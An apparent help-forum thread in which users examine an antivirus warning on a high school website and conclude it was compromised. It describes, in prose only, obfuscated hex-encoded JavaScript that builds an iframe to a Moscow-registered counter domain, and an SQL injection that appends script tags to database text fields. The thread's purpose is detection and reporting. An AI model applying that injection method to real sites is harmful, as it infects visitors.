virus on my high schools website? Or false positive?

Viruses and worms
1

Avast is blocking access to http://www.ausd.k12.ca.us/ahs for detecting JS:Packed-AJ [trj] virus. This is my high school’s website. I go there often and never have problem until today. Can anyone verify if there is a real virus or just false positive? Is there a way I can download the file and submit it to totalvirus for scanning? Any help would be appreciated. I need to do my homework, but don’t want to infected with a virus either.

2

Sophos Anti Virus doesn’t pick anything up and having a bried look through the source there isn’t anything that jumps out at me.

I think it’s safe to say it’s a false positive.

3

Huge block of obfuscated JS at the bottom of the page - infected.

4

Shame on Sophos in this one :stuck_out_tongue:
Seems the site was hacked…

5

suggest avast to your high school :smiley:

6

I agree ! :smiley:

7

I’ve already reported to Avast. Since they won’t get back to me, so no way to know what they found.

I’ve also submitted the file to VirusTotal for scanning and the result is that only Avast, Gdata, McAfee, and McAfee+Artemis detected something. Is this a new virus that other engines hasn’t picked up yet, or false positive? Is there any way to know for sure? ???

8

That is sufficient detection to be sure it needs investigating by the school.

It is becoming more common and many AVs don’t monitor the web traffic like avast and detect this obfuscated/packed javascript.

Javascript is a plain language form of scripting, so you can see what it is doing when people go to lengths to hide what it is doing then that is highly suspicious.

See image of the code inserted just before the closing Body tag, I have broken it up to make it easier to see, as it is on a single line.

You should report this to the Schools IT department or webmaster.

9

The word of the virus analyst before: infected.

10

Yup! I think it is infected now. I’ve studied the script on the page and it is a script which generate another script, and that script generate an iframe tag which goes to itcounter.net/counter.php?[ramdon#]

I then serached for itcounter.net but didn’t find much info. I’m afraid to go there directly knowing that a virus maybe waiting for me. Anybody is brave enough to check it out?

The fact that the script is highly hard to read plus a script to generate another script which generate an iframe tag is already highly suspicious. Not to mention that all the scripts are encoded with hex characters. Althought I can not 100% confirm if there is a virus or not, but I believe that 99% that it is. I’m going to report this to the site owner.

11

When you go to this much trouble to hide the intent, it is hoghly suspicious.

See http://www.siteadvisor.com/sites/itcounter.net/postid?p=1431136, somehow I don;t think your school gets a counter from a domain registered in Moscow.

So you should certainly report it to the administrator, rather than investigate, let them do that they should have been able to immediately recognise if that script was placed there by them.

12

Your site has been hit with a SQL Injection attack. Happened to a couple of my sites a while back.

The attack adds script tags with code to download and execute malicious code into all text or varchar(over 50 chars) fields in the database.

Look through your databse and you should see the code at the end of text strings.

I was able to code an asp script to clean my databases automatically, still have it if you need it - email me for it if you are running MS SQL Server under IIS and I can send it over. andrew at atmwebdesign dot ca

Andrew

13

Thanks Andrew, but I don’t own the site. I’ve notified the owner and hopefully they’ll fix it.